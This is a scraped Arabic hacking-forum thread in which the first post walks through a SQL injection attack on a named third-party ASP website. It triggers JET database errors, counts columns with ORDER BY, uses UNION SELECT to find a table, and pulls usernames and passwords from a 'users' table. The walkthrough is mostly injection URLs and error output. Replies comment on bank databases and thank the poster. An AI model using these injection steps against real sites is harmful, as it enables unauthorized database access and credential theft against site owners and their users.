شرح استغلال ثغرات Asp باحتراف ..

شرح استغلال ثغرات Asp باحتراف ..


النتائج 1 إلى 5 من 5

الموضوع: شرح استغلال ثغرات Asp باحتراف ..

العرض المتطور

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. #1

    Gadid شرح استغلال ثغرات Asp باحتراف ..

    السلام عليكم ورحمة الله وبركاته

    اليوم قررت اعمل لكم شرح عن استغلال ثغرات asp ..
    هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..

    ساشرح لكم كيفية استغلال خطأ sql تابع معى ..

    انا ساشرج لكم على موقع http://www.haybersqlogretiyo.com

    المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '
    http://www.haybersqlogretiyo.com/baskabibolum.asp?id=10"


    يظهر لنا الخطأ التالى :
    كود PHP:

    Microsoft JET Database Engine error ’80040e14’
    Syntax error in string in query expression ’id = 10";’.
    /baskabirbolum.asp, line 7


    الان نبدا نعد بالاعمدة للوصول الى العمود المطلوب
    http://www.haybersqlogretiyo.com/bas...=10+order+by+1

    الان عند الوصول الى العمود المصاب وهو 10
    http://www.haybersqlogretiyo.com/bas...10+order+by+10

    يظهر الخطأ التالى :


    كود PHP:


    Microsoft JET Database Engine error ’80040e14’
    The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.
    /news.asp, line 7

    ويكون العمود المصاب الرقم 8
    http://www.haybersqlogretiyo.com/bas...=10+order+by+8



    http://www.haybersqlogretiyo.com/bas...2,3,4,5,6, 7--

    الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة
    كود PHP:


    Microsoft JET Database Engine error ’80040e37’
    The Microsoft Jet database engine cannot find the input table or query ’hayber’. Make sure it exists and that its name is spelled correctly.
    /baskabirbolum.asp, line 7

    واسمها : hayber

    ويتم استغلالها .
    http://www.haybersqlogretiyo.com/bas... 7+from+hayber

    والان نظهر اسم اليوزر والباس
    http://www.haybersqlogretiyo.com/bas...6,7+from+users


    تم الموضوع بحمد الله
    وانشاء الله قريبا اشرح الموضوع على فيديو
    ارجوا ان استفدتوا من الموضوع ...

    تحياتي : admin

  2. #2
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: شرح استغلال ثغرات Asp باحتراف ..

    عزيزى اغلب قواعد البيانات للشركات وخاصة البنوك هيا اوركل

    وعلى ما اظن تقريبا اختراق البنوك ليس شئ صعب ولكن المستحيل هوا انك تتعآمل مع قاعدة البيانات

    بمعنى انك لازم تكون ملم بقراء لغة sql وليس ايجاد ثغرة لها لان اغلبهم على الاوركل

    بصرآحة موش مقتنع بآلطريقة معايا وكمان الموقع دا موش شغآل

    ولكن بآرك الله فيك ووآصًل آبدآعًك سواء كنت صاحب الموضوع او ناقل لة


    موفق ونتظر آلآفضَل منًك ...!!
    التعديل الأخير تم بواسطة يارب رحمتك ; 09-05-2012 الساعة 04:52 AM


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  3. #3
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: شرح استغلال ثغرات Asp باحتراف ..

    نسيت اقولك كمان ان دا موش بيتم عن طريق المتصفح لازم يكون بآك ترآك لان دا النظام الوحيد اللى تقدر تجيب منو معلْومات اكثر دقة عن نظام الويندوز

    لان فى منهم مركب على شبكات الـ cisco بآلتوفيق حبيبى


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  4. #4

    افتراضي رد: شرح استغلال ثغرات Asp باحتراف ..

    جميل جدا واصل الى الامام وانا بصراحة استفدت وان لم أفلح في التجريب

  5. #5

    افتراضي رد: شرح استغلال ثغرات Asp باحتراف ..

    مشكور موضوع جميل

المواضيع المتشابهه

  1. شرح استغلال ثغرات Asp باحتراف ..
    بواسطة M.Bomb في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 09-02-2012, 01:55 PM
  2. استغلال ثغرات xss
    بواسطة bougassa في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 01-29-2012, 12:27 AM
  3. استغلال ثغرات Xss
    بواسطة yheya في المنتدى قسم الثغرات
    مشاركات: 9
    آخر مشاركة: 01-28-2012, 09:18 PM
  4. استغلال ثغرات file upload
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 68
    آخر مشاركة: 09-18-2011, 07:13 PM
  5. درس استغلال ثغرات ال RFi مع التطبيق ---
    بواسطة Hidden pain في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 2
    آخر مشاركة: 12-10-2010, 06:08 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •